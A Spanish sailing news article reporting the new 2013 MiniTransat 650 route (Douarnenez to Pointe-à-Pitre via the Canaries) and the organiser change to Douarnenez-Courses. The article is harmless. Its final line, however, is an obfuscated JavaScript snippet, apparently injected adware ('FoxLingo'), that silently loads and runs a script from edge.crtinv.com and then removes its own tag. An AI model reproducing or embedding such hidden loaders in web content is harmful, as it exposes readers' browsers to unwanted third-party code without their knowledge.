Nuevo recorrido para la Minitransat 650
Por Dury Alónso
Dentro de un año, desde Douarnenez hasta Point-à-Prite con parada en las Islas Canarias. En la próxima edición no se cruzara el Ecuador. Cambio de Organización, ahora será Douarnenez-Courses en vez de Gran Pavois Organisation.
Al Caribe francés. Es un de los cambios más importantes en el recorrido de la regata transoceánica MiniTransat 650. Así como de la nueva Organización que llevara todo el peso de la próxima edición en octubre de 2013, y la de 2015.
En vez de finalizar en la ciudad brasileña de San Salvador de Bahía, será el puerto francés de ultramar Point-à-Prite en la isla caribeña de Guadalupe. Un lugar donde la MiniTransat ha finalizado en sus orígenes hasta que se cambio a San Salvador de Bahía. Según la dirección de la Clase 650, había llegado el momento de hacer una serie de cambios en la MiniTransat y el recorrido era uno de ellos, volver a los origines.
Nueva Organización. Se presentaron cuatro propuestas para Organización de las próximas ediciones de la MiniTransat y al final gano la opción de Douarnenez-Courses, frente a Gran Pavois Organisation que organizo las seis últimas ediciones de esta regata transatlántica.
Para Olivier Avram, Presidente de la Clase Mini 650, la decisión ha sido por: “Con la elección de Douarnenez-Courses se ha dado alternativa a otras opciones. Un nuevo equipo, un nuevo recorrido. No es que el trabajo realizado por GPO desde 2001 no respondiese a nuestras expectativas, pero probablemente era el momento de cambiar. Durante los últimos años la Organización GPO logro un nivel muy alto en lo relativo a seguridad, organización y notoriedad para la MiniTransat 650.”
Casi cuatro mil millas desde Douarnenez – Islas Canarias – Point-à-Prite. El nuevo recorrido para la MiniTransat 650 en 2013 partirá del puerto francés de Douarnenez, situado en la Bretaña, en el distrito de Quimper, tendrá una escala en las Islas Canarias y después cruzara el Atlántico hasta la isla de Guadalupe con llega en Point-à-Prite.
La primera etapa serán unas 1.300 millas desde la Bretaña francesa hasta las islas Canarias. Un recorrido sobre el que los patrones tendrán unas primeras cien millas sobre la plataforma continental francesa, con un calado de unos noventa metros, para después pasar el fondo a más de cuatro mil metros. Después de librase del Golfo de Vizcaya alcanzaran Cabo Finisterre, a unas 380 millas de la salida, para después hacer rumbo sur directo a las Islas Canarias.
El resto de las 2.690 millas náuticas será la segunda etapa entre Canarias y Guadalupe, la travesía atlántica por excelencia para los Mini 650. Que para la edición de 2013 no cruzaran la zona de calmas ecuatoriales.
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();